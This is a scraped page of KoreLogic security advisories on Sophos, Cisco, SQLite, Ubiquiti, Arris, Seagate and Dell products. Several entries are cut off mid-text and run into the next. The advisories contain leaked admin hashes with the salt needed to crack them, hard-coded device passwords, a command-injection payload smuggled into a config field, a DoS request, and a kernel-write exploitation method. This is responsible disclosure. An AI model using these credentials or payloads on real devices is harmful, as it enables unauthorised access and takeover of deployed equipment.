KL-001-2016-008 : Sophos Web Appliance Privilege Escalation Title: Sophos Web Appliance Privilege Escalation Advisory ID: KL-001-2016-008 Publication Date: 2016.11.03 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-008.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: Web Apppliance Affected Version: v4.2.1.3 Platform: Embedded Linux CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-261: Weak Cryptography for Passwords Impact: Privilege Escalation Attack vector: HTTP 2. Vulnerability Description An unprivileged user can obtain an MD5 hash of the administrator password which can then be used to discover the plain-text password. 3. Technical Description A user with the privileges: Helpdesk, Policy, Reporting, or User Activity can obtain an MD5 hash for the Full Access Administrator account. A valid session identifier is required and is delivered through the STYLE parameter. GET /index.php?c=change_password=7151e50b0389755717510f218b1af00c HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close HTTP/1.1 200 OK Date: Tue, 10 May 2016 00:36:43 GMT Server: Apache X-UA-Compatible: IE=7 Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 8798 ... {"currentUser":"test","globalUser":false,"swa_title":"Change Password","usersJS":"[{\"id\":\"default_admin\",\"username\":\"admin\",\"name\":\"Default Administrator\",\"password\":\"f98d0973dffdc3a29ee67167c15b882e\",\"description\":\"Default Administrator Account\",\"admin\":true,\"roles\":\"Full Access Administrator\",\"reporting_groups\":[]},{\"id\":\"5605c1fef6927d2c45a62b0abcba5385\",\"username\":\"test\",\"name\":\"test\",\"password\":\"caeaea5602b40c779b8669b7001f3396\",\"description\":\"asdfghj\",\"admin\":false,\"roles\":[\"helpdesk\",\"policy\",\"reporting\",\"user_activity\"],\"reporting_groups\":[\"all\"]},{\"id\":\"a39244da844197796609fc5b8aad7f3c\",\"username\":\"woot\",\"name\":\"woot\",\"password\":\"f0ce19faed6df0443c80aceea4c7b7ae\",\"description\":\"none\",\"admin\":false,\"roles\":[\"helpdesk\"],\"reporting_groups\":[]}]","cma":{"joined":false,"host":"","is_cma":false,"swa_joined":false,"is_vm":true},"locale":"en","trialMode":true,"licenseDaysLeft":29,"navigation":["\nCancel<\/span>\n<\/a>","\nSave<\/span>\n<\/a>"],"navigation_left":[],"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid","uiStatusMessages":{"status_processing":"Submitting...","status_password_dont_match":"Password mismatch","status_invalid_password":"Invalid password","status_current_password_invalid":"Current password invalid"},"rba":{"reports":true,"search":true,"configuration":true,"system_status":false,"help_support":true,"editable":true,"current_user":"test","globalUser":false,"admin_role":false} ... A fixed salt is apparently used for all such devices: P3T3R p@rk3r The admin MD5 hash in this case is: f98d0973dffdc3a29ee67167c15b882e 4. Mitigation and Remediation Recommendation The vendor has issued a fix for this vulnerability in Version 4.3 of SWA. Release notes available at: http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos. 2016.09.14 - Sophos requests KoreLogic re-send vulnerability details. 2016.09.28 - KoreLogic requests status update. 2016.09.28 - Sophos informs KoreLogic that an update including a fix for this vulnerability will be available near the end of October. 2016.10.13 - Sophos informs KoreLogic that the update was released to a limited customer base and is expected to be distributed at-large over the following week. 2016.11.03 - Public disclosure. 7. Proof of Concept >>> from hashlib import md5 >>> md5('P3T3R p@rk3radmin123').hexdigest() 'f98d0973dffdc3a29ee67167c15b882e' The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials
KL-001-2016-005 : Cisco Firepower Threat Management Console Hard-coded MySQL Credentials Title: Cisco Firepower Threat Management Console Hard-coded MySQL Credentials Advisory ID: KL-001-2016-005 Publication Date: 2016.10.05 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-005.txt 1. Vulnerability Details Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-798: Use of Hard-coded Credentials Impact: Authentication Bypass CVE-ID: CVE-2016-6434 2. Vulnerability Description The root account for the local MySQL database has poor password complexity. 3. Technical Description root@firepower:/Volume/6.0.1# mysql -u root --password=admin Warning: Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 23348 Server version: 5.6.24-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial) Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> show databases; ++ | Database | ++ | information_schema | | Sourcefire | | external_data | | external_schema| | mysql | | performance_schema | | sfsnort| ++ 7 rows in set (0.00 sec) mysql> Note that mysqld listens only on loopback, so a remote attacker would have to leverage some other condition to be able to reach the mysql daemon. 4. Mitigation and Remediation Recommendation The vendor has acknowledged this vulnerability but has not released a fix for the issue. Vendor acknowledgement available at: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc1 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco. 2016.06.30 - Cisco acknowledges receipt of vulnerability report. 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for this vulnerability and for 3 others reported in the same product. 2016.08.12 - 30 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.02 - 45 business days have elapsed since the vulnerability was reported to Cisco. 2016.09.09 - KoreLogic asks for an update on the status of the remediation efforts. 2016.09.15 - Cisco confirms remediation is underway and soon to be completed. 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details will be released publicly on 2016.10.05. 2016.10.05 - Public disclosure. 7. Proof of Concept See Technical Description The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt signature.asc Description: OpenPGP digital signature
KL-001-2016-004 : Cisco Firepower Threat Management Console Authenticated Denial of Service
KL-001-2016-004 : Cisco Firepower Threat Management Console Authenticated Denial of Service Title: Cisco Firepower Threat Management Console Authenticated Denial of Service Advisory ID: KL-001-2016-004 Publication Date: 2016.10.05 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-004.txt 1. Vulnerability Details Affected Vendor: Cisco Affected Product: Firepower Threat Management Console Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213) Platform: Embedded Linux CWE Classification: CWE-404: Improper Resource Shutdown or Release Impact: Denial of Service Attack vector: HTTP 2. Vulnerability Description A authenticated user can send an HTTP request that will crash the Mojo Server thereby making future access impossible until a system reboot is performed. 3. Technical Description The parameter uuid is passed to a chmod function as part of a file path. A ';' in the path causes the function to return an exception. POST /pjb.cgi HTTP/1.1 Host: 1.3.3.7 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Content-Type: application/x-www-form-urlencoded Referer: https://1.3.3.7/ddd/ Content-Length: 1180 Cookie: x-auto-507=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; x-auto-467=%7B%22state%22%3A%7B%22offset%22%3A%22i%3A0%22%2C%20%22limit%22%3A%22i%3A20%22%7D%7D; CGISESSID=ab588faec87c38a18347787e3b442ff8 Connection: close =SF::UI::PJB::Vpn::List::saveVpnDeployment=%5B%7B%22password%22%3A%22test%22%2C+%22authentication_method%22%3A%22password%22%2C+%22type%22%3A%22PTP%22%2C+%22advanced_setting%22%3A%7B%22ah%22%3A0%2C+%22life_bytes%22%3A%220%22%2C+%22life_time%22%3A1%2C+%22life_time_unit%22%3A%22hours%22%2C+%22life_packets%22%3A%220%22%2C+%22ike_life_time%22%3A3%2C+%22ike_life_time_unit%22%3A%22hours%22%2C+%22ikev2%22%3A1%2C+%22ike_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22modp2048%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22modp2048%22%7D%5D%7D%2C+%22phase2_algorithm%22%3A%7B%22other_message_allowed%22%3A0%2C+%22auth_messages%22%3A%5B%7B%22cipher%22%3A%22aes128%22%2C+%22hash%22%3A%22sha1%22%2C+%22dh%22%3A%22%22%7D%2C%7B%22cipher%22%3A%22aes256%22%2C+%22hash%22%3A%22sha256%22%2C+%22dh%22%3A%22%22%7D%5D%7D%7D%2C+%22status%22%3A0%2C+%22name%22%3A%22test%22%2C+%22uuid%22%3A%2207a0d152-09fc-11e6-93cc-9d074250060f;%22%2C+%22applied%22%3A-1%7D%2C%5B%5D%5D_action_id=a5ba3e29eb18730f7c8dc88d53b48759=1=AllVpnList As no exception handler is defined, the process exits. Perl traceback: The 'file' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;.lock") to SF::System::chmod did not pass the 'Type Validator (system.file)' callback at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 73 SF::System::__ANON__('The \'file\' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc...') called at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 640 SF::System::chmod('HASH(0x114c3c88)') called at /usr/local/sf/lib/perl/5.10.1/SF/Util.pm line 619 SF::Util::wait_for_lock('/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;', 120) called at /usr/local/sf/lib/perl/5.10.1/SF/EODataHandler/VPNDeployment.pm line 206 SF::EODataHandler::VPNDeployment::get_lock('07a0d152-09fc-11e6-93cc-9d074250060f;') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB/Vpn/List.pm line 540 SF::UI::PJB::Vpn::List::saveVpnDeployment('HASH(0x1154bf38)', 'ARRAY(0x11513750)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 859 SF::UI::PJB::executeFunction('SF::UI::PJB::Vpn::List::saveVpnDeployment', 'ARRAY(0x11513720)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 821 SF::UI::PJB::handleRequest('SF::UI::PJB::Vpn::List::saveVpnDeployment', '[{"password":"test", "authentication_method":"password", "typ...') called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 39 eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 42 SF::Mojo::Handlers::PjbHandler::handle_pjb_cgi('SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)') called at
KL-001-2016-003 : SQLite Tempdir Selection Vulnerability
KL-001-2016-003 : SQLite Tempdir Selection Vulnerability Title: SQLite Tempdir Selection Vulnerability Advisory ID: KL-001-2016-003 Publication Date: 2016.07.01 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-003.txt 1. Vulnerability Details Affected Vendor: SQLite/Hwaci Affected Product: SQLite Affected Version: All versions prior to 3.13.0 Platform: UNIX, GNU/Linux CWE Classification: CWE-379: Creation of Temporary File in Directory with Incorrect Permissions Impact: Data Leakage Attack vector: Local 2. Vulnerability Description Usually processes writing to temporary directories do not need to perform readdir() because they control the filenames they create, so setting /tmp/ , /var/tmp/ , etc. to be mode 1733 is a not uncommon UNIX hardening practice. Affected versions of SQLite reject potential tempdir locations if they are not readable, falling back to '.'. Thus, SQLite will favor e.g. using cwd for tempfiles on such a system, even if cwd is an unsafe location. Notably, SQLite also checks the permissions of '.', but ignores the results of that check. By itself, this is only a POLA (Principle of Least Astonishment) violation that may cause unexpected failures. However, this might in turn cause software that uses SQLite libraries to behave in unsafe ways, leaking sensitive data, opening up SQLite libraries to attack by deliberately corrupted tempfiles, etc. 3. Technical Description SQLite creates tempfiles only under certain specific circumstances, and the behavior is tunable in various ways; see https://www.sqlite.org/tempfiles.html for more background. Generally speaking, the below does not apply for rollback journals, master journals, write-ahead log (WAL) files, or shared-memory (-shm) files. They may apply for various other tempfile types. When a tempfile must be created, sanity checks are performed on candidate tempdir locations; these checks are flawed. src/os_unix.c (which is merged into sqlite3.c during the release-tarball preparation process) performs these checks when considering candidate temporary directory locations (quoted from commit 0064a8c77b, 2016-02-23): /* ** Return the name of a directory in which to put temporary files. ** If no suitable temporary file directory can be found, return NULL. */ static const char *unixTempFileDir(void){ static const char *azDirs[] = { 0, 0, "/var/tmp", "/usr/tmp", "/tmp", "." }; unsigned int i; struct stat buf; const char *zDir = sqlite3_temp_directory; if( !azDirs[0] ) azDirs[0] = getenv("SQLITE_TMPDIR"); if( !azDirs[1] ) azDirs[1] = getenv("TMPDIR"); for(i=0; i
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution Title: Ubiquiti Administration Portal CSRF to Remote Command Execution Advisory ID: KL-001-2016-002 Publication Date: 2016.06.28 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt 1. Vulnerability Details Affected Vendor: Ubiquiti Affected Product: AirGateway, AirFiber, mFi Affected Version: 1.1.6, 3.2, 2.1.11 Platform: Embedded Linux CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF); CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') Impact: Arbitrary Code Execution Attack vector: HTTP 2. Vulnerability Description The Ubiquiti AirGateway, AirFiber and mFi platforms feature remote administration via an authenticated web-based portal. Lack of CSRF protection in the Remote Administration Portal, and unsafe passing of user input to operating system commands exectuted with root privileges, can be abused in a way that enables remote command execution. 3. Technical Description The firmware files analyzed were AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and firmware.bin respectively. The MD5 hash values for the vulnerable files served by the administration portal are: AirGateway b45fe8e491d62251f0a7a100c636178a /usr/www/system.cgi AirFiber d8926f7f65a2111f4036413f985082b9 /usr/www/system.cgi mFi960e8f6e507b227dbc4b65fc7a7036bc /usr/www/system.cgi The firmware file contains a LZMA compressed, squashfs partition. The binaries running on the embedded device are compiled for a MIPS CPU. The device can be easily virtualized using QEMU: Example: sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf The administration portal does not issue a randomized CSRF token either per session, page, or request. Administration authorization is solely based on cookie control. Therefore, it is possible to embed JavaScript into an HTML page so when an administrator is socially engineered into visiting the page, the target device will be accessed with privileges. Device configuration POST parameters include tokens passed to operating system commands run as root in unsafe ways with insufficient input sanitization. Command injection is possible by stacking shell commands in parameters such as iptables.1.cmd. In order for a developer to recreate this discovery, the following instructions should be duplicated. a. Authenticate to the target web application and navigate to the SYSTEM page. b. Download the current configuration. c. Open the configuration in an editor of your choice, navigate to the line containing: iptables.1.cmd=-A FIREWALL -j ACCEPT d. Append the following onto that line: ;touch /var/tmp/csrf-to-rce.txt e. Save the changes, and submit the modified configuration. Apply the changes using apply.cgi afterward. Example: POST /system.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*; q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: https://192.168.1.1/system.cgi Cookie: ui_language=en_US; last_check=1452020493426; AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93 Connection: keep-alive Content-Type: multipart/form-data; boundary=---4384928471732886672453075690 Content-Length: 7204 ... iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt ... GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1 Host: 192.168.1.1 X-Requested-With: XMLHttpRequest Referer: https://192.168.1.1/system.cgi Cookie: ui_language=en_US; last_check=1452020493426; AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93 Connection: keep-alive f. Change your IP address, but ensure continued routing to the target web application. Incrementing the last octet is sufficient. g. Open the configuration in an editor of your choice, navigate to the modified line and alter it: ;touch /var/tmp/csrf-to-rce-newsrc.txt h. Repeat step 5 from the new IP address. You will receive the same response. Apply the changes using the apply.cgi file. i. Login to the target device using SSH or telnet, navigate to /var/tmp and type ls. j. You'll discover both files exist. 4. Mitigation and Remediation Recommendation At this time there is
KL-001-2016-001 : Arris DG1670A Cable Modem Remote Command Execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 KL-001-2016-001 : Arris DG1670A Cable Modem Remote Command Execution Title: Arris DG1670A Cable Modem Remote Command Execution Advisory ID: KL-001-2016-001 Publication Date: 2016.02.12 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-001.txt 1. Vulnerability Details Affected Vendor: Arris Affected Product: Cable Modem Affected Version: DG1670A, TG1670 Platform: Embedded Linux CWE Classification: CWE-73: External Control of File Name or Path; CWE-77: Improper Neutralization of Special Elements used in a Command; CWE-522: Insufficiently Protected Credentials Impact: Arbitrary Code Execution Attack vector: Telnet CVE-ID: 2. Vulnerability Description The Arris DG1670A leverages a combination of technologies to deliver the product functionality. Combining several of these technologies in an unanticipated way will allow an attacker to execute arbitrary commands on the underlying operating system as the most privileged user. 3. Technical Description Use the password: JhAkuo18 On August 28, 2015 a user on GitHub by the name of GuerrillaWarfare posted a new repository named Junkyard. The repository had firmware images for popular cable modems. Repository: https://github.com/GuerrillaWarfare/Junkyard Filename: TS0801102P_100714_NA.16XX.GW.ATOM.img Below is the directory content of the squashfs-root directory contained within the image: # ls bin etc gw.fsname include linuxrc nvram sbin share tmp var version dev fss hdisk1 lib mnt proc scripts sysusr var.tar vop The default IP address assigned to Arris modems is 192.168.100.1 and is routable from networks where the modem is attached. Below is a Nmap output of services listening on the default IP address: # sudo nmap -T5 -sU -sT -p- 192.168.100.1 Nmap scan report for 192.168.100.1 Host is up (0.0053s latency). PORT STATE SERVICE VERSION 80/tcp open http lighttpd 443/tcp open ssl/http lighttpd 2602/tcp open ripd? 8080/tcp open http lighttpd A service listening on port 2602 is usually associated with Quagga. Going back to the squashfs-root directory, if we grep through the content of this file system there are several .conf files containing passwords. One of the files containing passwords is zebra.conf, which can be used to authenticate to the Quagga telnet console. # grep -ri "password" *.conf|more etc/default/ripngd.conf:password JhAkuo18 etc/default/zebra.conf:password JhAkuo18 etc/default/ripd.conf:password JhAkuo18 $ telnet 192.168.100.1 2602 Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]'. Hello, this is Quagga (version 0.99.16). Copyright 1996-2005 Kunihiro Ishiguro, et al. User Access Verification Password: PROMPT> Entering a '?' at any point gives context-sensitive help text. There are several layers of 'privilege' though there are no restrictions on elevating on this device. Quagga is an open-source routing daemon commonly found in routers, access points, and modems. In the case described, it has been implemented on a cable modem to facilitate route provisioning from local ISP to the public internet. PROMPT> ? echo Echo a message back to the vty enableTurn on privileged mode command exit Exit current mode and down to previous mode help Description of the interactive help system list Print command list quit Exit current mode and down to previous mode show Show running system information terminal Set terminal line parameters who Display who is on vty PROMPT> enable PROMPT# ? clear Reset functions configure Configuration from vty interface copy Copy configuration debug Debugging functions (see also 'undebug') disableTurn off privileged mode command echo Echo a message back to the vty endEnd current mode and change to enable mode. exit Exit current mode and down to previous mode help Description of the interactive help system list Print command list logmsg Send a message to enabled logging destinations no Negate a command or set its defaults quit Exit current mode and down to previous mode show Show running system information terminal Set terminal line parameters whoDisplay who is on vty write Write running configuration to memory,
KL-001-2015-007 : Seagate GoFlex Satellite Remote Telnet Default Password
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 KL-001-2015-007 : Seagate GoFlex Satellite Remote Telnet Default Password Title: Seagate GoFlex Satellite Remote Telnet Default Password Advisory ID: KL-001-2015-007 Publication Date: 2015.12.18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-007.txt 1. Vulnerability Details Affected Vendor: Seagate Affected Product: GoFlex Satellite Affected Version: 1.3.7 Platform: Embedded Linux CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel; CWE-798: Use of Hard-coded Credentials Impact: Remote Administration Attack vector: Telnet CVE-ID: CVE-2015-2874 2. Vulnerability Description Seagate GoFlex Satellite Mobile Wireless Storage devices contain a hardcoded backdoor account. An attacker could use this account to remotely tamper with the underlying operating system when Telnet is enabled. 3. Technical Description root@wpad:/tmp/jfroot# ls bin boot dev etc home include lib linuxrc media mnt proc satellite_app sbin share srv static sys tmp usr var root@wpad:/tmp/jfroot# cd etc root@wpad:/tmp/jfroot/etc# ls angstrom-version default fstabinit.d iproute2 motd org_passwd protocols rc4.d rS.d terminfo udhcpc.d autoUpdURLdevice_table groupinittab issue mtab passwd rc0.d rc5.d scsi_id.config timestampudhcpd.conf avahi device_table-opkghost.confinputrc issue.net network passwd- rc1.d rc6.d services tinylogin.links udhcpd_factory.conf busybox.links fb.modes hostname internal_if.conf localtime nsswitch.confprofile rc2.d rcS.d skel ts.conf version dbus-1filesystems hostsipkg mke2fs.conf opkg profile.drc3.d rpc syslog.conf udev root@wpad:/tmp/jfroot/etc# cat passwd root:VruSTav0/g/yg:0:0:root:/home/root:/bin/sh daemon:*:1:1:daemon:/usr/sbin:/bin/sh bin:*:2:2:bin:/bin:/bin/sh sys:*:3:3:sys:/dev:/bin/sh sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/bin/sh man:*:6:12:man:/var/cache/man:/bin/sh lp:*:7:7:lp:/var/spool/lpd:/bin/sh mail:*:8:8:mail:/var/mail:/bin/sh news:*:9:9:news:/var/spool/news:/bin/sh uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh proxy:*:13:13:proxy:/bin:/bin/sh www-data:*:33:33:www-data:/var/www:/bin/sh backup:*:34:34:backup:/var/backups:/bin/sh list:*:38:38:Mailing List Manager:/var/list:/bin/sh irc:*:39:39:ircd:/var/run/ircd:/bin/sh gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:*:65534:65534:nobody:/nonexistent:/bin/sh xoFaeS:QGd9zEjQYxxf2:500:500:Linux User,,,:/home/xoFaeS:/bin/sh The xoFaeS user cracked to etagknil. 4. Mitigation and Remediation Recommendation The vendor has released a patch that can be obtained using the Download Finder located at https://apps1.seagate.com/downloads/request.html 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2015.09.11 - Vulnerability details and PoC sent to Seagate. 2015.09.15 - Seagate confirms receipt. 2015.09.28 - Seagate indicates a patch is ready but not yet available to the public. 2015.09.28 - KoreLogic asks Seagate if they have obtained a CVE-ID for the vulnerability. 2015.10.27 - Seagate notifies KoreLogic that the patch is publicly available. Seagate indicates they are waiting for a CVE before releasing a security advisory. 2015.12.08 - KoreLogic requests an update on the CVE-ID and associated Seagate advisory. 2015.12.08 - Seagate responds with a link to http://www.kb.cert.org/vuls/id/903500 2015.12.18 - Public disclosure. 7. Proof of Concept N/A The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and
KL-001-2015-008 : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 KL-001-2015-008 : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address Title: Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address Advisory ID: KL-001-2015-008 Publication Date: 2015.12.18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-008.txt 1. Vulnerability Details Affected Vendor: Dell Affected Product: Pre-Boot Authentication Driver Affected Version: 1.0.1.5 Platform: Microsoft Windows XP SP3, Microsoft Windows 2003 SP2, Microsoft Windows 7 CWE Classification: CWE-20: Improper input validation Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-6856 2. Vulnerability Description The Dell Pre-Boot Authentication Driver (PBADRV.sys) contains a vulnerability that can be leveraged to enable an attacker to write arbitrary code. The 'OutputAddress' from the IOCTL call is not validated before it attempts to write to memory. The content of the write is a four-byte hex value that is always greater than that of the kernel base address. Using multiple writes, it may be possible to overwrite the first entry of HalDispatchTable in a way that the entry would point to a user-land address. An attacker need only allocate shellcode at said address and call the ntdll!NtQueryIntervalProfile() function. 3. Technical Description Example against Windows XP: Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [C:\WINXP\MEMORY.DMP] Kernel Complete Dump File: Full address space is available Symbol search path is: srv* Executable search path is: Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 2600.xpsp_sp3_qfe.101209-1646 Machine Name: Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0 Debug session time: Tue Feb 3 05:41:17.712 2015 (UTC - 8:00) System Uptime: 0 days 0:03:46.296 Loading Kernel Symbols kd> !analyze -v READ_ADDRESS: 909090d4 FAULTING_IP: +2902faf00efdfc0 0008 8b4044 mov eax,dword ptr [eax+44h] MM_INTERNAL_CODE: 0 DEFAULT_BUCKET_ID: DRIVER_FAULT BUGCHECK_STR: 0x50 PROCESS_NAME: pythonw.exe TRAP_FRAME: b24bdc8c -- (.trap 0xb24bdc8c) ErrCode = eax=90909090 ebx=8060ea01 ecx= edx=0021f7f0 esi=012c1be8 edi=b24bdd64 eip=0008 esp=b24bdd00 ebp=b24bdd20 iopl=0 nv up ei ng nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010286 0008 8b4044 mov eax,dword ptr [eax+44h] ds:0023:909090d4= Resetting default scope LAST_CONTROL_TRANSFER: from 8051cc7f to 804f8cc5 STACK_TEXT: b24bdc14 8051cc7f 0050 909090d4 nt!KeBugCheckEx+0x1b b24bdc74 805405d4 909090d4 nt!MmAccessFault+0x8e7 b24bdc74 0008 909090d4 nt!KiTrap0E+0xcc WARNING: Frame IP not in any known module. Following frames may be wrong. b24bdcfc 8063d5cd 0001 000c b24bdd14 0x8 b24bdd20 8060eb43 0002 b24bdd64 0021f7f8 nt!KeQueryIntervalProfile+0x37 b24bdd54 8053d6d8 0002 012c1be8 0021f7fc nt!NtQueryIntervalProfile+0x61 b24bdd54 7c90e514 0002 012c1be8 0021f7fc nt!KiFastCallEntry+0xf8 0021f7e4 7c90d84a 1d1add9a 0002 012c1be8 ntdll!KiFastSystemCallRet 0021f7e8 1d1add9a 0002 012c1be8 0021f89c ntdll!NtQueryIntervalProfile+0xc 0021f7fc 1d1acab6 1d1ac900 0021f81c 0008 _ctypes!DllCanUnloadNow+0x5b6a 0021f82c 1d1a8db8 7c90d83e 0021f920 24f7d09f _ctypes!DllCanUnloadNow+0x4886 0021f8dc 1d1a959e 1100 7c90d83e 0021f910 _ctypes!DllCanUnloadNow+0xb88 0021f984 1d1a54d8 7c90d83e 012d4300 _ctypes!DllCanUnloadNow+0x136e 0021f9dc 1e07cf0c 012d4300 _ctypes+0x54d8 5044408b 04bb 88808b00 python27!PyObject_Call+0x4c STACK_COMMAND: kb FOLLOWUP_IP: nt!KiTrap0E+cc 805405d4 85c0testeax,eax SYMBOL_STACK_INDEX: 2 SYMBOL_NAME: nt!KiTrap0E+cc FOLLOWUP_NAME: MachineOwner MODULE_NAME: nt IMAGE_NAME: ntkrnlpa.exe DEBUG_FLR_IMAGE_TIMESTAMP: 4d00d4fb FAILURE_BUCKET_ID: 0x50_nt!KiTrap0E+cc BUCKET_ID: 0x50_nt!KiTrap0E+cc Followup: MachineOwner - Example against Windows 7: Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86 Copyright (c) Microsoft Corporation. All rights reserved. Loading Dump File [C:\Users\dev\Desktop\Mini091715-01.dmp] Mini Kernel Dump File: Only registers and stack trace are available Symbol search path is: *** Invalid *** *
KL-001-2015-006 : Linksys EA6100 Wireless Router Authentication Bypass
